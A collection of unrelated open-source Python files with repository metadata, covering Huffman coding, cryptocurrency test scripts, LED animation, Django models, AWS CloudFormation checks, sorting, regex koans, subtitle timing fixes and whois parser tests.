self.array_codes = array.array('B', array_codes)
fp.close()
def decode_as(self, filename):
decoded = self._decode()
fout = open(filename, 'wb')
fout.write(decoded)
fout.close()
if __name__=='__main__':
original_file = 'filename.txt'
compressed_file = 'compressed.scw'
decompressed_file = 'filename2.txt'
# first way to use Encoder/Decoder
enc = Encoder(original_file)
enc.write(compressed_file)
dec = Decoder(compressed_file)
dec.decode_as(decompressed_file)
# second way
#enc = Encoder()
#enc.encode(original_file)
#enc.write(compressed_file)
#dec = Decoder()
#dec.read(compressed_file)
#dec.decode_as(decompressed_file)
|
fepe55/RAMB0
|
python/huffman2.py
|
Python
|
mit
| 6,447
|
#!/usr/bin/env python
#
# Generate pnSeed[] from Pieter's DNS seeder
#
NSEEDS=600
import re
import sys
from subprocess import check_output
def main():
lines = sys.stdin.readlines()
ips = []
pattern = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3}):11000")
for line in lines:
m = pattern.match(line)
if m is None:
continue
ip = 0
for i in range(0,4):
ip = ip + (int(m.group(i+1)) << (8*(i)))
if ip == 0:
continue
ips.append(ip)
for row in range(0, min(NSEEDS,len(ips)), 8):
print " " + ", ".join([ "0x%08x"%i for i in ips[row:row+8] ]) + ","
if __name__ == '__main__':
main()
|
prolifik/Furrycoin
|
contrib/seeds/makeseeds.py
|
Python
|
mit
| 709
|
# Source:https://github.com/FastLED/FastLED/blob/master/examples/Fire2012WithPalette/Fire2012WithPalette.ino
from __future__ import division
import math
import random
from colour import Color
#import randomcolor
from PIL import Image, ImageChops, ImageDraw, ImageFont
from components import App
def hex_to_rgb(value):
value = value.lstrip('#')
lv = len(value)
return tuple(int(value[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))
class Pattern_Fire(App):
""" Create a fire animation """
def __init__(self, device):
self.device = device
self.width = device.width
self.height = device.height
self.heat = [[0 for x in range(device.width)]
for y in range(device.height)]
# COOLING: How much does the air cool as it rises?
# Less cooling = taller flames. More cooling = shorter flames.
# Default 55, suggested range 20-100
self.cooling = 100
# SPARKING: What chance (out of 255) is there that a new spark will be lit?
# Higher chance = more roaring fire. Lower chance = more flickery fire.
# Default 120, suggested range 50-200.
self.sparking = 80
black = Color("black")
red = Color("red")
yellow = Color("yellow")
blue = Color("#6b99ff")
white = Color("white")
self.colors = []
self.colors += list(black.range_to(red, 116))
self.colors += list(red.range_to(yellow, 140))
self.colors += list(yellow.range_to(white, 10))
self.image = None
def handle_input(self, command):
if command == "UP":
self.cooling -= 1
elif command == "DOWN":
self.cooling += 1
elif command == "LEFT":
self.sparking += 1
elif command == "RIGHT":
self.sparking -= 1
self.cooling = min(max(self.cooling, 0), 255)
self.sparking = min(max(self.sparking, 0), 255)
def draw_frame(self):
pix = self.device.image.load()
for x in range(self.width):
# Step 1: cool down every cell a little
for y in range(self.height):
cooling_factor = random.randint(
0, int(((self.cooling * 10) / self.height) + 2))
self.heat[x][y] = max(self.heat[x][y] - cooling_factor, 0)
# Step 2: Heat from each cell drifts up and diffuses a little
for y in range(self.height):
y1 = min(y + 1, self.height - 1)
y2 = min(y + 2, self.height - 1)
self.heat[x][y] = (self.heat[x][y1] + self.heat[x]
[y2] + self.heat[x][y2]) / 3
# Step 3: Randomly ignite sparks of heat
if random.randrange(0, 255) < self.sparking:
y0 = self.height - 1
self.heat[x][y0] = min(
(self.heat[x][y0] + random.randrange(160, 255)), 255)
# Step 4: Map to the colors
for y in range(self.height):
color_index = int(self.heat[x][y]) # int(math.ceil(self.heat[x][y]))
c = self.colors[color_index]
pix[x, y] = (int(c.red * 255), int(c.green * 255), int(c.blue * 255))
self.device.display()
return 10
|
mattgrogan/ledmatrix
|
ledmatrix/pattern/fire.py
|
Python
|
mit
| 3,096
|
from django.db import models
from django.contrib.auth.models import User
class StockStatus(models.Model):
date = models.DateTimeField(auto_now_add=True)
price = models.FloatField()
change = models.FloatField()
volume = models.IntegerField()
average_daily_volume = models.IntegerField()
market_cap = models.CharField(max_length=100)
book_value = models.FloatField()
ebitda = models.CharField(max_length=100)
dividend_per_share = models.FloatField()
dividend_yield = models.FloatField()
earnings_per_share = models.FloatField()
i52_week_high = models.FloatField()
i52_week_low = models.FloatField()
i50_day_moving_average = models.FloatField()
i200_day_moving_average = models.FloatField()
price_to_earnings_ratio = models.FloatField()
price_to_earnings_growth_ratio = models.FloatField()
price_to_sales_ratio = models.FloatField()
price_to_book_ratio = models.FloatField()
class Stock(models.Model):
symbol = models.CharField(max_length=25)
exchange = models.CharField(max_length=25)
history = models.ManyToManyField(StockStatus)
price = models.FloatField()
def __unicode__(self): return self.symbol
class Order(models.Model):
type = models.CharField(max_length=25)
amount = models.IntegerField()
stock = models.ForeignKey(Stock)
date = models.DateTimeField(auto_now_add=True)
def __unicode__(self): return u'%s %s' % (self.type, self.stock.symbol)
class Position(models.Model):
amount = models.IntegerField()
stock = models.ForeignKey(Stock)
value = models.FloatField()
def __unicode__(self): return u'%s of %s' % (self.amount, self.stock.symbol)
class Portfolio(models.Model):
user = models.ForeignKey(User)
history = models.ManyToManyField(Order)
positions = models.ManyToManyField(Position)
value = models.FloatField()
balance = models.FloatField()
created = models.DateTimeField(auto_now_add=True)
def __unicode__(self): return self.user.username
|
jwilson780/VirtualStockMarket
|
stockmarket/models.py
|
Python
|
mit
| 2,038
|
# TODO WIP this is meant to find discrepencies between the stack templates that
# are deployed to CloudFormation and what is checked in, and do some other
# basic sanity checks on the stacks and their configurations
import boto3
import re
cloudformation = boto3.client("cloudformation")
stacks = cloudformation.describe_stacks()
# Stack Notifications
# Examines all stacks to ensure they have the shared CloudFormation
# notification SNS topic configured as a notification ARN
cfn_topic = (
"arn:aws:sns:us-east-1:561178107736:infrastructure-"
"notifications-CloudFormationNotificationSnsTopic-2OCAWQM7S7BP"
)
print("======================================================================")
print("These stacks do NOT include the notification ARN:")
for stack in stacks["Stacks"]:
if cfn_topic not in stack["NotificationARNs"]:
print(f"{stack['StackName']}")
# Template continuity
# Compares the template for certain stacks, as they exist in CloudFormation,
# to your local copy. If you are on master these should not have any
# differences. The first line each template should contain a relative path
# to the file in the Infrastructure repo. If that path appears to be missing,
# this will report a warning
print("======================================================================")
for stack in stacks["Stacks"]:
cfn_template = cloudformation.get_template(StackName=stack["StackName"])
cfn_body = cfn_template["TemplateBody"]
cfn_first_line = cfn_body.split("\n", 1)[0]
if re.match(r"\# ([a-zA-Z/_\-\.]+yml)", cfn_first_line) is None:
print(f"Missing template path: {stack['StackName']}")
else:
template_path = re.findall(r"\# ([a-zA-Z/_\-\.]+yml)", cfn_first_line)[0]
local_path = f"../{template_path}"
try:
local_body = open(local_path, "r").read()
except FileNotFoundError:
print(f"File error: {stack['StackName']}")
if not local_body == cfn_body:
print(f"Template mismatch: {stack['StackName']}")
|
PRX/Infrastructure
|
bin/continuity.py
|
Python
|
mit
| 2,044
|
import numpy as np
from . import finiteelements as fe
from . import matrices
from math import cos
class Result:
def __init__(self):
pass
def __init__(self, freq, u1, u2, u3, mesh, geometry):
self.freq = freq
self.u1 = u1
self.u2 = u2
self.u3 = u3
self.mesh = mesh
self.geometry = geometry
def rad_per_sec_to_Hz(self, rps):
return rps/(2*np.pi)
def get_displacement_and_deriv(self, x1, x2, x3, time):
element = self.mesh.get_element(x1, x3)
if (element is None):
print ("x1 = {}, x2 = {}".format(x1, x3))
u_nodes = np.zeros((8))
u_nodes[0] = self.u1[element.top_left_index]
u_nodes[1] = self.u1[element.top_right_index]
u_nodes[2] = self.u1[element.bottom_right_index]
u_nodes[3] = self.u1[element.bottom_left_index]
u_nodes[4] = self.u3[element.top_left_index]
u_nodes[5] = self.u3[element.top_right_index]
u_nodes[6] = self.u3[element.bottom_right_index]
u_nodes[7] = self.u3[element.bottom_left_index]
h_e = matrices.element_aprox_functions(element, x1, x2, x3)
return h_e.dot(u_nodes) * self.fi(time)
def get_strain(self, x1, x2, x3, time):
B = matrices.deriv_to_grad(self.geometry, x1, x2, x3)
u = self.get_displacement_and_deriv(x1, x2, x3, time)
grad_u = B.dot(u)
E = matrices.grad_to_strain()
# E_NL = grad_to_strain_nonlinear_matrix(alpha1, alpha2, geometry, grad_u)
return E.dot(grad_u)
def get_strain_nl(self, x1, x2, x3, time):
B = matrices.deriv_to_grad(self.geometry, x1, x2, x3)
u = self.get_displacement_and_deriv(x1, x2, x3, time)
grad_u = B.dot(u)
E = matrices.grad_to_strain()
E_NL = matrices.deformations_nl(self.geometry, grad_u, x1, x2, x3)
return (E + E_NL).dot(grad_u)
def fi(self, time):
return cos(self.freq * time)
|
tarashor/vibrations
|
py/fem/result.py
|
Python
|
mit
| 2,014
|
""" Define a Check monad and corresponding functions.
"""
from functools import (reduce, partial)
class Check:
""" This super class is not really necessary but helps make the structure
clear.
data Check a = Pass a | Fail Message
"""
pass
class Pass(Check):
def __init__(self, value):
self.value = value
class Fail(Check):
def __init__(self, message):
self.message = message
def is_(t, x):
""" Check whether the type of a given x is a given type t.
"""
return type(x) is t
is_check = partial(is_, Check)
is_pass = partial(is_, Pass)
is_fail = partial(is_, Fail)
def return_(x):
""" Monadic return for the Check monad.
return :: a -> m a
return = Pass
"""
return Pass(x)
def bind(f):
""" Monadic bind for the Check monad.
(>>=) :: m a -> (a -> m b) -> m b
Fail x >>= f = Fail x
Pass x >>= f = f x
"""
def bind_impl(x):
if is_fail(x):
return x
if is_pass(x):
return f(x.value)
raise ValueError('Check has to be of type Pass | Fail.')
return bind_impl
def compose(f, g):
""" Kleisli composition of two (Check-)monadic functions f and g.
(>=>) :: (a -> m b) -> (b -> m c) -> (a -> m c)
"""
def compose_impl(x):
return bind(g)(f(x))
return compose_impl
def compose_many(*fs):
""" Reduces a variable number of functions with composition.
Same as repeatedly calling `compose` on pairs.
"""
return reduce(compose, fs)
def lift(f, message):
""" Lifts a boolean function into the realm of the Check monad.
lift :: (a -> bool) -> String -> (a -> Check a)
"""
def lift_impl(x):
if f(x):
return return_(x)
return Fail(message)
return lift_impl
|
kdungs/python-mcheck
|
mcheck/__init__.py
|
Python
|
mit
| 1,840
|
"""
Revision ID: 0146_add_service_callback_api
Revises: 0145_add_notification_reply_to
Create Date: 2017-11-28 15:13:48.730554
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
revision = '0146_add_service_callback_api'
down_revision = '0145_add_notification_reply_to'
def upgrade():
op.create_table('service_callback_api_history',
sa.Column('id', postgresql.UUID(as_uuid=True), nullable=False),
sa.Column('service_id', postgresql.UUID(as_uuid=True), nullable=False),
sa.Column('url', sa.String(), nullable=False),
sa.Column('bearer_token', sa.String(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('updated_by_id', postgresql.UUID(as_uuid=True), nullable=False),
sa.Column('version', sa.Integer(), autoincrement=False, nullable=False),
sa.PrimaryKeyConstraint('id', 'version')
)
op.create_index(op.f('ix_service_callback_api_history_service_id'), 'service_callback_api_history',
['service_id'], unique=False)
op.create_index(op.f('ix_service_callback_api_history_updated_by_id'), 'service_callback_api_history',
['updated_by_id'], unique=False)
op.create_table('service_callback_api',
sa.Column('id', postgresql.UUID(as_uuid=True), nullable=False),
sa.Column('service_id', postgresql.UUID(as_uuid=True), nullable=False),
sa.Column('url', sa.String(), nullable=False),
sa.Column('bearer_token', sa.String(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('updated_by_id', postgresql.UUID(as_uuid=True), nullable=False),
sa.Column('version', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['service_id'], ['services.id'], ),
sa.ForeignKeyConstraint(['updated_by_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_service_callback_api_service_id'), 'service_callback_api', ['service_id'], unique=True)
op.create_index(op.f('ix_service_callback_api_updated_by_id'), 'service_callback_api', ['updated_by_id'], unique=False)
def downgrade():
op.drop_index(op.f('ix_service_callback_api_updated_by_id'), table_name='service_callback_api')
op.drop_index(op.f('ix_service_callback_api_service_id'), table_name='service_callback_api')
op.drop_table('service_callback_api')
op.drop_index(op.f('ix_service_callback_api_history_updated_by_id'), table_name='service_callback_api_history')
op.drop_index(op.f('ix_service_callback_api_history_service_id'), table_name='service_callback_api_history')
op.drop_table('service_callback_api_history')
|
alphagov/notifications-api
|
migrations/versions/0146_add_service_callback_api.py
|
Python
|
mit
| 2,779
|
"""
Author: Maneesh Divana <mdaneeshd77@gmail.com>
Interpreter: Python 3.6.8
Quick Sort
Worst Case: O(n^2)
Average Case: O(nlog n)
Best Case: O(nlog n)
"""
from random import shuffle
def partition(arr: list, left: int, right: int) -> int:
"""Partitions the given array based on a pivot element,
then sorts the sub-arrays and returns the partition index"""
# Take the right most element as pivot
pivot = arr[right]
# i tracks the smallest element, currently invalid
i = left - 1
for j in range(left, right):
# Check if the current element is smaller than pivot element
if arr[j] <= pivot:
i += 1
# If so, swap the smallest element and the current element
arr[i], arr[j] = arr[j], arr[i]
# One final swap to put pivot element at its correct position
arr[i + 1], arr[right] = arr[right], arr[i + 1]
# Return the partition index
return i + 1
def qsort(arr: list, left: int, right: int) -> None:
"""Recursively partitions the given array and sorts based on
QuickSort algorithm."""
if left < right:
# Partition the array and get the partition index
p_idx = partition(arr, left, right)
# Recursively partition and sort the sub-arrays
qsort(arr, left, p_idx - 1)
qsort(arr, p_idx + 1, right)
if __name__ == "__main__":
ARR = list(range(0, 10))
shuffle(ARR)
LEFT = 0
RIGHT = len(ARR) - 1
print("\nQuickSort\n")
print("Input array:", ARR)
qsort(ARR, LEFT, RIGHT)
print("\nSorted array:", ARR, "\n")
|
maneeshd/Algorithms-and-Data-Structures
|
algorithms/QuickSort.py
|
Python
|
mit
| 1,581
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
import re
class AboutRegex(Koan):
"""
These koans are based on the Ben's book: Regular Expressions in 10 minutes.
I found this books very useful so I decided to write a koans in order to practice everything I had learned from it.
http://www.forta.com/books/0672325667/
"""
def test_matching_literal_text(self):
"""
Lesson 1 Matching Literal String
"""
string = "Hello, my name is Felix and this koans are based on the Ben's book: Regular Expressions in 10 minutes."
m = re.search(r'Felix', string)
self.assertTrue(m and m.group(0) and m.group(0)== 'Felix', "I want my name")
def test_matching_literal_text_how_many(self):
"""
Lesson 1 How many matches?
The default behaviour of most regular expression engines is to return just the first match.
In python you have the next options:
match() --> Determine if the RE matches at the beginning of the string.
search() --> Scan through a string, looking for any location where this RE matches.
findall() --> Find all substrings where the RE matches, and returns them as a list.
finditer() --> Find all substrings where the RE matches, and returns them as an iterator.
"""
string = "Hello, my name is Felix and this koans are based on the Ben's book: Regular Expressions in 10 minutes. Repeat My name is Felix"
m = len(re.findall('Felix', string)) #TIP: Maybe match it's not the best option
# I want to know how many times appears my name
self.assertEqual(m, 2)
def test_matching_literal_text_not_case_sensitivity(self):
"""
Lesson 1 Matching Literal String non case sensitivity.
Most regex implementations also support matches that are not case sensitive. In python you can use re.IGNORECASE, in
Javascript you can specify the optional i flag.
In Ben's book you can see more languages.
"""
string = "Hello, my name is Felix or felix and this koans is based on the Ben's book: Regular Expressions in 10 minutes."
self.assertEqual(re.findall("felix", string), ['felix'])
self.assertEqual(re.findall("felix", string, re.IGNORECASE), ['Felix', 'felix'])
def test_matching_any_character(self):
"""
Lesson 1 Matching any character
. matches any character, alphabetic characters, digits and .
"""
string = "pecks.xlx\n" \
+ "orders1.xls\n" \
+ "apec1.xls\n" \
+ "na1.xls\n" \
+ "na2.xls\n" \
+ "sa1.xls"
# TIP: remember the name of this lesson
change_this_search_string = r'a.\.xl.' # <-- I want to find all uses of myArray
self.assertEquals(len(re.findall(change_this_search_string, string)),3)
def test_matching_set_character(self):
"""
Lesson 2 Matching sets of characters
A set of characters is defined using the metacharacters [ and ]. Everything between them is part of the set and
any one of the set members must match (but not all).
"""
string = "sales.xlx\n" \
+ "sales1.xls\n" \
+ "orders3.xls\n" \
+ "apac1.xls\n" \
+ "sales2.xls\n" \
+ "na1.xls\n" \
+ "na2.xls\n" \
+ "sa1.xls\n" \
+ "ca1.xls"
# I want to find all files for North America(na) or South America(sa), but not (ca)
# TIP you can use the pattern .a. which matches in above test but in this case matches more than you want
change_this_search_string = '[ns]a[0-9].xls'
self.assertEquals(len(re.findall(change_this_search_string, string)),3)
def test_anything_but_matching(self):
"""
Lesson 2 Using character set ranges
Occasionally, you'll want a list of characters that you don't want to match.
Character sets can be negated using the ^ metacharacter.
"""
string = "sales.xlx\n" \
+ "sales1.xls\n" \
+ "orders3.xls\n" \
+ "apac1.xls\n" \
+ "sales2.xls\n" \
+ "sales3.xls\n" \
+ "europe2.xls\n" \
+ "sam.xls\n" \
+ "na1.xls\n" \
+ "na2.xls\n" \
+ "sa1.xls\n" \
+ "ca1.xls"
# I want to find the name sam
change_this_search_string = '[^nc]am.xls'
self.assertEquals(re.findall(change_this_search_string, string), ['sam.xls'])
|
taw/python_koans
|
python3/koans/about_regex.py
|
Python
|
mit
| 4,842
|
from django.db.models import CharField
DEFALT_PROTOCOLS = ('http', 'https', 'mailto', 'tel')
class HrefField(CharField):
def __init__(
self,
protocols=DEFALT_PROTOCOLS,
allow_paths=True,
allow_fragments=True,
allow_query_strings=True,
max_length=255,
**kwargs):
self.protocols = protocols
self.allow_paths = allow_paths
self.allow_fragments = allow_fragments
self.allow_query_strings = allow_query_strings
kwargs['max_length'] = max_length
super(HrefField, self).__init__(**kwargs)
#TODO - FUNCTIONALITY!
|
adamalton/django-href-field
|
hreffield/fields.py
|
Python
|
mit
| 657
|
import json
from collections import OrderedDict
import numpy as np
import matplotlib.pyplot as plt
with open('data/EURUSD3600.json') as f:
data = json.loads(f.read())
data = OrderedDict(sorted(data.items()))
for i, v in data.iteritems():
print 'timestamp', i
print v['rate']
points = OrderedDict(sorted(v['price_points'].items()))
for k, d in points.iteritems():
print k
print points
plt.scatter(i, v['rate'])
plt.show()
|
Tjorriemorrie/trading
|
04_oanda/viz.py
|
Python
|
mit
| 463
|
'''
Created on Mar 28, 2016
@author: Ziv
'''
class MyClass(object):
'''
classdocs
'''
def __init__(self, params):
'''
Constructor
'''
import sys
import os
from getArgs import getParams
from parse import parse
__all__ = []
__version__ = 0.1
__date__ = '2015-05-24'
__updated__ = '2015-05-24'
DEBUG = 1
TESTRUN = 0
PROFILE = 0
def getNextSub(f):
#file is at a beginning of a sub
#returns three strings, None if EOF was reached
#handle multiple empty lines
line = f.readline()
while line == '\n':
line=f.readline()
text=''
num=line[:-1] #remove \n
time=f.readline()[:-1]
for line in f:
if line == '' or line == '\n':
#end of sub
return (num, time, text[:-1])
text += line
else:#EOF reached
return (None, None, None)
def convertSubTimetoSec(subTime):
#receives sub time, 12 characters string in the format hh:mm:ss,mmm
#where mmm is miliceconds
#returns the time in seconds, type float
res=parse('{h:d}:{m:d}:{s:d},{ms:d}', subTime)
return res['ms']/1000+res['s']+res['m']*60+res['h']*3600
def convertSectoSubTime(sec):
H = sec//3600
remain=sec%3600
M = remain//60
remain=remain%60
S = remain//1
remain=remain%1
Mili = (remain*1000)//1 #make it an integer
res= '{0:0=2n}:{1:0=2n}:{2:0=2n},{3:0=3n}'.format(H,M,S,Mili)
return res
def getMovieLenFromFile(fileName):
with open(fileName, mode='r') as f:
return getMovieLenFromStream(f)
def getMovieLenFromStream(f):
try:
if f.seekable():
f.seek(0, 2)
l=f.tell()
f.seek(l-200, 0)
else:
print ('cannot seek file')
except:
print("Unexpected error:", sys.exc_info()[0])
raise
f.readline() #flush till next line
"find a separating line - an empty line"
for line in f:
if line == '\n': break
else: print('empty line not found')
#get the next sub
(num, time, text) = getNextSub(f)
#get the last sub
(a, b, c) = getNextSub(f)
while a is not None:
(num, time, text) = (a, b, c)
(a, b, c) = getNextSub(f)
#now we have the last sub
return convertSubTimetoSec(time[0:12])
def calculateOffset(params):
"Set fixed file name"
params.outfname = params.fname[:-4]+'.fixed'+params.fname[-4:]
"Handle case were endDiff wasn't specified"
if params.endDiff == None:
params.endDiff = params.startDiff
"Calculates the offsets depending on the time of the entry"
if params.direction == 'movie-before':
"subtitle needs to be earlier, will negate the values"
params.startDiff = -params.startDiff
params.endDiff = -params.endDiff
params.movieLen = getMovieLenFromFile(params.fname)
return params
def correctTime(args, subTime):
t=convertSubTimetoSec(subTime)
resT=t+args.startDiff+((args.endDiff-args.startDiff)*(t/args.movieLen))
if resT<0: resT=0
return convertSectoSubTime(resT)
def processFile(args):
try:
inFile = open(args.fname, mode='r')
outFile= open(args.outfname, mode='w')
(num, time, text) = getNextSub(inFile)
while num is not None:
t1=correctTime(args, time[:12])
t2=correctTime(args, time[17:])
outFile.write(num+'\n')
outFile.write(t1+' --> '+t2+'\n')
outFile.write(text+'\n\n')
(num, time, text) = getNextSub(inFile)
inFile.close()
outFile.close()
except:
print("Unexpected error:", sys.exc_info()[0])
print("out file name:%s\n" % args.outfname)
raise
return True
|
ziv17/SRT-tools
|
srtFix/src/srtFix/processFile.py
|
Python
|
mit
| 3,797
|
#!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Copyright (c) 2016 The Bitcoin Unlimited developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
from test_framework.blocktools import create_block, create_coinbase
'''
Test version bits' warning system.
Generate chains with block versions that appear to be signalling unknown
soft-forks, and test that warning alerts are generated.
'''
VB_PERIOD = 144 # versionbits period length for regtest
VB_THRESHOLD = 108 # versionbits activation threshold for regtest
VB_TOP_BITS = 0x20000000
VB_UNKNOWN_BIT = 27 # Choose a bit unassigned to any deployment
# TestNode: bare-bones "peer". Used mostly as a conduit for a test to sending
# p2p messages to a node, generating the messages in the main testing logic.
class TestNode(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.ping_counter = 1
self.last_pong = msg_pong()
def add_connection(self, conn):
self.connection = conn
def on_inv(self, conn, message):
pass
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def on_pong(self, conn, message):
self.last_pong = message
# Sync up with the node after delivery of a block
def sync_with_ping(self, timeout=30):
self.connection.send_message(msg_ping(nonce=self.ping_counter))
received_pong = False
sleep_time = 0.05
while not received_pong and timeout > 0:
time.sleep(sleep_time)
timeout -= sleep_time
with mininode_lock:
if self.last_pong.nonce == self.ping_counter:
received_pong = True
self.ping_counter += 1
return received_pong
class VersionBitsWarningTest(BitcoinTestFramework):
def setup_chain(self):
initialize_chain_clean(self.options.tmpdir, 1)
def setup_network(self):
self.nodes = []
self.alert_filename = os.path.join(self.options.tmpdir, "alert.txt")
# Open and close to create zero-length file
with open(self.alert_filename, 'w') as f:
pass
self.node_options = ["-debug", "-logtimemicros=1", "-alertnotify=echo %s >> \"" + self.alert_filename + "\""]
self.nodes.append(start_node(0, self.options.tmpdir, self.node_options))
import re
self.vb_pattern = re.compile("^Warning.*versionbit")
# Send numblocks blocks via peer with nVersionToUse set.
def send_blocks_with_version(self, peer, numblocks, nVersionToUse):
tip = self.nodes[0].getbestblockhash()
height = self.nodes[0].getblockcount()
block_time = self.nodes[0].getblockheader(tip)["time"]+1
tip = int(tip, 16)
for i in range(numblocks):
block = create_block(tip, create_coinbase(height+1), block_time)
block.nVersion = nVersionToUse
block.solve()
peer.send_message(msg_block(block))
block_time += 1
height += 1
tip = block.sha256
peer.sync_with_ping()
def test_versionbits_in_alert_file(self):
with open(self.alert_filename, 'r') as f:
alert_text = f.read()
assert(self.vb_pattern.match(alert_text))
def run_test(self):
# Setup the p2p connection and start up the network thread.
test_node = TestNode()
connections = []
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_node))
test_node.add_connection(connections[0])
NetworkThread().start() # Start up network handling in another thread
# Test logic begins here
test_node.wait_for_verack()
# 1. Have the node mine one period worth of blocks
self.nodes[0].generate(VB_PERIOD)
# 2. Now build one period of blocks on the tip, with < VB_THRESHOLD
# blocks signaling some unknown bit.
nVersion = VB_TOP_BITS | (1<<VB_UNKNOWN_BIT)
self.send_blocks_with_version(test_node, VB_THRESHOLD-1, nVersion)
# Fill rest of period with regular version blocks
self.nodes[0].generate(VB_PERIOD - VB_THRESHOLD + 1)
# Check that we're not getting any versionbit-related errors in
# getinfo()
assert(not self.vb_pattern.match(self.nodes[0].getinfo()["errors"]))
# 3. Now build one period of blocks with >= VB_THRESHOLD blocks signaling
# some unknown bit
self.send_blocks_with_version(test_node, VB_THRESHOLD, nVersion)
self.nodes[0].generate(VB_PERIOD - VB_THRESHOLD)
# Might not get a versionbits-related alert yet, as we should
# have gotten a different alert due to more than 51/100 blocks
# being of unexpected version.
# Check that getinfo() shows some kind of error.
assert(len(self.nodes[0].getinfo()["errors"]) != 0)
# Mine a period worth of expected blocks so the generic block-version warning
# is cleared, and restart the node. This should move the versionbit state
# to ACTIVE.
self.nodes[0].generate(VB_PERIOD)
stop_node(self.nodes[0], 0)
wait_bitcoinds()
# Empty out the alert file
with open(self.alert_filename, 'w') as f:
pass
self.nodes[0] = start_node(0, self.options.tmpdir, ["-debug", "-logtimemicros=1", "-alertnotify=echo %s >> \"" + self.alert_filename + "\""])
# Connecting one block should be enough to generate an error.
self.nodes[0].generate(1)
assert(len(self.nodes[0].getinfo()["errors"]) != 0)
stop_node(self.nodes[0], 0)
wait_bitcoinds()
self.test_versionbits_in_alert_file()
# Test framework expects the node to still be running...
self.nodes[0] = start_node(0, self.options.tmpdir, ["-debug", "-logtimemicros=1", "-alertnotify=echo %s >> \"" + self.alert_filename + "\""])
if __name__ == '__main__':
VersionBitsWarningTest().main()
|
marlengit/BitcoinUnlimited
|
qa/rpc-tests/p2p-versionbits-warning.py
|
Python
|
mit
| 6,299
|
from rest_framework import serializers
from rest_framework import pagination
from .models import Airport
class AirportSerializer(serializers.ModelSerializer):
read_only_fields = ('id','name','city','country','country_code','iata','icao')
class Meta:
model = Airport
class PaginationAirportSerializer(pagination.PaginationSerializer):
class Meta:
object_serializer_class = AirportSerializer
|
illing2005/django-airports-apis
|
airports/serializers.py
|
Python
|
mit
| 433
|
# This file is autogenerated. Do not edit it manually.
# If you want change the content of this file, edit
#
# spec/fixtures/responses/whois.nic.sn/status_registered
#
# and regenerate the tests with the following script
#
# $ scripts/generate_tests.py
#
from nose.tools import *
from dateutil.parser import parse as time_parse
import yawhois
class TestWhoisNicSnStatusRegistered(object):
def setUp(self):
fixture_path = "spec/fixtures/responses/whois.nic.sn/status_registered.txt"
host = "whois.nic.sn"
part = yawhois.record.Part(open(fixture_path, "r").read(), host)
self.record = yawhois.record.Record(None, [part])
def test_status(self):
eq_(self.record.status, 'registered')
def test_available(self):
eq_(self.record.available, False)
def test_domain(self):
eq_(self.record.domain, "google.sn")
def test_nameservers(self):
eq_(self.record.nameservers.__class__.__name__, 'list')
eq_(len(self.record.nameservers), 4)
eq_(self.record.nameservers[0].__class__.__name__, 'Nameserver')
eq_(self.record.nameservers[0].name, "ns1.google.com")
eq_(self.record.nameservers[1].__class__.__name__, 'Nameserver')
eq_(self.record.nameservers[1].name, "ns2.google.com")
eq_(self.record.nameservers[2].__class__.__name__, 'Nameserver')
eq_(self.record.nameservers[2].name, "ns3.google.com")
eq_(self.record.nameservers[3].__class__.__name__, 'Nameserver')
eq_(self.record.nameservers[3].name, "ns4.google.com")
def test_admin_contacts(self):
eq_(self.record.admin_contacts.__class__.__name__, 'list')
eq_(len(self.record.admin_contacts), 1)
eq_(self.record.admin_contacts[0].__class__.__name__, 'Contact')
eq_(self.record.admin_contacts[0].type, yawhois.record.Contact.TYPE_ADMINISTRATIVE)
eq_(self.record.admin_contacts[0].id, "C5-SN")
eq_(self.record.admin_contacts[0].name, "C5-SN")
def test_registered(self):
eq_(self.record.registered, True)
def test_created_on(self):
eq_(self.record.created_on.__class__.__name__, 'datetime')
eq_(self.record.created_on, time_parse('2008-05-08 17:59:38.43'))
def test_registrar(self):
eq_(self.record.registrar.__class__.__name__, 'Registrar')
eq_(self.record.registrar.id, "registry")
eq_(self.record.registrar.name, "registry")
def test_registrant_contacts(self):
eq_(self.record.registrant_contacts.__class__.__name__, 'list')
eq_(len(self.record.registrant_contacts), 1)
eq_(self.record.registrant_contacts[0].__class__.__name__, 'Contact')
eq_(self.record.registrant_contacts[0].type, yawhois.record.Contact.TYPE_REGISTRANT)
eq_(self.record.registrant_contacts[0].id, "C4-SN")
eq_(self.record.registrant_contacts[0].name, "C4-SN")
def test_technical_contacts(self):
eq_(self.record.technical_contacts.__class__.__name__, 'list')
eq_(len(self.record.technical_contacts), 1)
eq_(self.record.technical_contacts[0].__class__.__name__, 'Contact')
eq_(self.record.technical_contacts[0].type, yawhois.record.Contact.TYPE_TECHNICAL)
eq_(self.record.technical_contacts[0].id, "C6-SN")
eq_(self.record.technical_contacts[0].name, "C6-SN")
def test_updated_on(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.updated_on)
def test_domain_id(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.domain_id)
def test_expires_on(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.expires_on)
def test_disclaimer(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.disclaimer)
|
huyphan/pyyawhois
|
test/record/parser/test_response_whois_nic_sn_status_registered.py
|
Python
|
mit
| 3,849
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
